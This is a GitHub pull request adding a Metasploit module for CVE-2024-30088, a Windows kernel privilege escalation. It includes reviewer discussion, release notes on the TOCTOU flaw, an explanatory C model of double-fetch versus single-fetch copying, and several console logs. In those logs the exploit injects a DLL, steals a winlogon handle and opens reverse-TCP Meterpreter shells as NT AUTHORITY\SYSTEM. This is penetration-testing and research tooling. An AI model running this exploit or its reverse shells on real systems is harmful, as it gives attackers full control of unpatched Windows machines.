Windows LPE CVE-2024-30088 #19345
Conversation
Branch updated: 14b5ad0 to 4811577
Branch updated: bed314c to 31348da
Resolved review threads on outdated code:
external/source/exploits/CVE-2024-30088/CVE-2024-30088/exploit.h
external/source/exploits/CVE-2024-30088/CVE-2024-30088/dllmain.c
documentation/modules/exploit/windows/local/cve_2024_30088_authz_basep.md
external/source/exploits/CVE-2024-30088/CVE-2024-30088/exploit.c
…/metasploit-framework into win-kernel-lpe-cve-2024-30038
The file external/source/exploits/CVE-2024-30088/CVE-2024-30088/ReflectiveFreeAndExitThread.c still exists, but it is empty?
Resolved review threads on outdated code:
external/source/exploits/CVE-2024-30088/CVE-2024-30088/exploit.c (3 threads)
external/source/exploits/CVE-2024-30088/CVE-2024-30088/exploit.h (4 threads)
external/source/exploits/CVE-2024-30088/CVE-2024-30088/dllmain.c
external/source/exploits/CVE-2024-30088/CVE-2024-30088/ReflectiveFreeAndExitThread.c
Thanks for the detailed review @bwatters! I've applied your suggestions, recompiled the dll and retested the module.
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > rexploit
[*] Reloading module...
[-] Handler failed to bind to 172.16.199.1:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: Windows 10+ Build 19045
[*] Reflectively injecting the DLL into 8680...
[*] Attempting to steal the handle from the winlogon process...
[+] Successfully stole winlogon handle: 1936
[+] Successfully retrieved winlogon pid: 720
[*] Sending stage (201798 bytes) to 172.16.199.139
[*] Meterpreter session 3 opened (172.16.199.1:4444 -> 172.16.199.139:53613) at 2024-08-29 19:13:23 -0400
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/cve_2024_30088_authz_basep) >
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > sessions -i -1
[*] Starting interaction with 3...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-FGNRA7E
OS : Windows 10 (10.0 Build 19045).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >
Resolved review threads on outdated code:
external/source/exploits/CVE-2024-30088/CVE-2024-30088/exploit.h (2 threads)
external/source/exploits/CVE-2024-30088/CVE-2024-30088/dllmain.c
external/source/exploits/CVE-2024-30088/CVE-2024-30088/ReflectiveFreeAndExitThread.c
Just posting for context. The first time I tested on
Looks good to me.
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > show options
Module options (exploit/windows/local/cve_2024_30088_authz_basep):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.26.90.20 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x64
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > set lport 4445
lport => 4445
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > set session -1
session => -1
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > exploit
[*] Started reverse TCP handler on 172.26.90.20:4445
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: Windows 10+ Build 19045
[*] Reflectively injecting the DLL into 2676...
[+] The exploit was successful, reading SYSTEM token from memory...
[+] Successfully stole winlogon handle: 2740
[+] Successfully retrieved winlogon pid: 3680
[*] Sending stage (201798 bytes) to 172.26.91.192
[*] Meterpreter session 2 opened (172.26.90.20:4445 -> 172.26.91.192:50278) at 2024-09-16 09:32:53 -0400
meterpreter > sysinfo
Computer : DESKTOP-9VQV3U4
OS : Windows 10 (10.0 Build 19045).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 4
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 8728 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19045.2251]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>ver
ver
Microsoft Windows [Version 10.0.19045.2251]
C:\Windows\system32>
msf6 payload(windows/x64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 4...
meterpreter > getuid
Server username: DESKTOP-V413087\msfconsole
meterpreter > bg
[*] Backgrounding session 4...
msf6 payload(windows/x64/meterpreter_reverse_tcp) > search authz_basep
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/local/cve_2024_30088_authz_basep 2024-06-11 excellent Yes Windows Kernel Time of Check Time of Use LPE in AuthzBasepCopyoutInternalSecurityAttributes
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/local/cve_2024_30088_authz_basep
msf6 payload(windows/x64/meterpreter_reverse_tcp) > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > set payload windows/x64/meterpreter_reverse_tcp
payload => windows/x64/meterpreter_reverse_tcp
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > show options
Module options (exploit/windows/local/cve_2024_30088_authz_basep):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
Payload options (windows/x64/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
EXTENSIONS no Comma-separate list of extensions to load
EXTINIT no Initialization strings for extensions
LHOST 172.31.7.159 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x64
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > set lport 4445
lport => 4445
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > set lhost 192.168.3.3
lhost => 192.168.3.3
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > set session -1
session => -1
msf6 exploit(windows/local/cve_2024_30088_authz_basep) > exploit
[*] Started reverse TCP handler on 192.168.3.3:4445
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: Windows 10+ Build 19045
[*] Reflectively injecting the DLL into 3960...
[+] The exploit was successful, reading SYSTEM token from memory...
[+] Successfully stole winlogon handle: 8008
[+] Successfully retrieved winlogon pid: 568
[*] Meterpreter session 5 opened (192.168.3.3:4445 -> 10.5.134.118:50287) at 2024-09-17 07:41:41 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
vProcess 1908 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19045.2006]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>ver
ver
Microsoft Windows [Version 10.0.19045.2006]
C:\Windows\system32>
Release Notes
This adds a Windows LPE post module that exploits CVE-2024-30088. Once the exploit is executed through a running
CVE-2024-30088 is a Windows Kernel Elevation of Privilege Vulnerability which affects many recent versions of Windows 10, Windows 11 and Windows Server 2022.
The vulnerability exists inside the function called AuthzBasepCopyoutInternalSecurityAttributes, specifically when the kernel copies the _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION of the current token object to user mode. When the kernel performs the copy of the SecurityAttributesList, it sets the list of the SecurityAttribute structures directly to the user-supplied pointer. It then calls RtlCopyUnicodeString and AuthzBasepCopyoutInternalSecurityAttributeValues to copy out the names and values of the SecurityAttribute, leading to multiple Time Of Check Time Of Use (TOCTOU) vulnerabilities in the function.
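The defect class described above (a privileged copy-out routine that keeps working from memory the caller can still modify) is easiest to see in a small model. The block below is an added example written for this review; it is not the kernel's code, not the module's code, and the structure `user_attr_list`, the functions `copyout_double_fetch` and `copyout_single_fetch`, the limit `KERNEL_MAX` and the "racing thread" hook are all constructed for the toy. The vulnerable shape validates a count read from caller memory and then re-reads that memory while copying; the hardened shape captures everything that drives control flow into memory the caller cannot reach, validates the capture once, and never touches the original again.

```c
#include <stdint.h>
#include <stdio.h>

/*
 * Toy model of a double-fetch (TOCTOU) copy-out routine. Constructed for
 * illustration only: none of these names or structures are Windows kernel
 * code. The "user" structure stands for memory the caller controls and can
 * change from another thread while privileged code is still working on it.
 */
#define KERNEL_MAX 4            /* policy limit on entries the kernel will copy */
#define USER_SLOTS 16           /* storage actually present in the toy user buffer */

typedef struct {
    uint32_t count;             /* caller-declared number of entries */
    uint32_t values[USER_SLOTS];
} user_attr_list;

/* Stands in for the racing thread: invoked between the check and the use. */
typedef void (*race_hook)(user_attr_list *u);

/* Vulnerable shape: validates count with one read of user memory, then
 * re-reads it in the loop. If user memory changes in between, the check no
 * longer applies to the value that drives the copy. */
static int copyout_double_fetch(volatile user_attr_list *user, uint32_t *kbuf,
                                race_hook hook)
{
    if (user->count > KERNEL_MAX)        /* check: first fetch */
        return -1;
    if (hook)
        hook((user_attr_list *)user);    /* race window: user memory changes */
    uint32_t copied = 0;
    for (uint32_t i = 0; i < user->count; i++) {   /* use: second fetch */
        if (i >= USER_SLOTS) break;      /* keeps the toy itself memory-safe */
        kbuf[i] = user->values[i];
        copied++;
    }
    return (int)copied;
}

/* Hardened shape: capture every field that drives control flow into
 * kernel-owned storage exactly once, validate the captured copy, and do
 * all further work from the capture. */
static int copyout_single_fetch(volatile user_attr_list *user, uint32_t *kbuf,
                                race_hook hook)
{
    uint32_t count = user->count;        /* single fetch into kernel memory */
    if (count > KERNEL_MAX)
        return -1;
    uint32_t snap[KERNEL_MAX];
    for (uint32_t i = 0; i < count; i++)
        snap[i] = user->values[i];       /* capture payload before use */
    if (hook)
        hook((user_attr_list *)user);    /* same race window, now harmless */
    for (uint32_t i = 0; i < count; i++)
        kbuf[i] = snap[i];
    return (int)count;
}

/* The racing thread's move in this toy: raise count after the check passed. */
static void grow_after_check(user_attr_list *u) { u->count = 8; }

static void init_user(user_attr_list *u)
{
    u->count = 4;                        /* passes the KERNEL_MAX check */
    for (uint32_t i = 0; i < USER_SLOTS; i++) u->values[i] = 100 + i;
}

/* Returns how many entries the vulnerable variant copies when raced. */
int demo_double_fetch(void)
{
    user_attr_list u; uint32_t kbuf[USER_SLOTS] = {0};
    init_user(&u);
    return copyout_double_fetch(&u, kbuf, grow_after_check);   /* 8: limit bypassed */
}

/* Returns how many entries the hardened variant copies when raced. */
int demo_single_fetch(void)
{
    user_attr_list u; uint32_t kbuf[USER_SLOTS] = {0};
    init_user(&u);
    return copyout_single_fetch(&u, kbuf, grow_after_check);   /* 4: limit held */
}

int main(void)
{
    printf("double fetch copied %d entries (limit %d)\n", demo_double_fetch(), KERNEL_MAX);
    printf("single fetch copied %d entries (limit %d)\n", demo_single_fetch(), KERNEL_MAX);
    return 0;
}
```

In the toy the destination buffer is deliberately oversized so the bypass shows up as a count (8 copied against a limit of 4) rather than as memory corruption; in real code with a destination sized for `KERNEL_MAX`, the same second fetch would write past the end of it. The review point for any copy-out routine is the same as in the hardened variant: every length, pointer or count taken from caller-controlled memory is read once into privileged storage, validated there, and the original is never consulted again.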
Setup
Windows 10 22H2 versions without the patch (before 10.0.19045.4529) are vulnerable out of the box.
This exploit module has been tested on Windows 10 version 22H2 build 19045.2965.
Verification Steps
use windows/local/cve_2024_30088_authz_basep
Set the LHOST, LPORT, and SESSION options
You should get a new session as the NT AUTHORITY\SYSTEM user.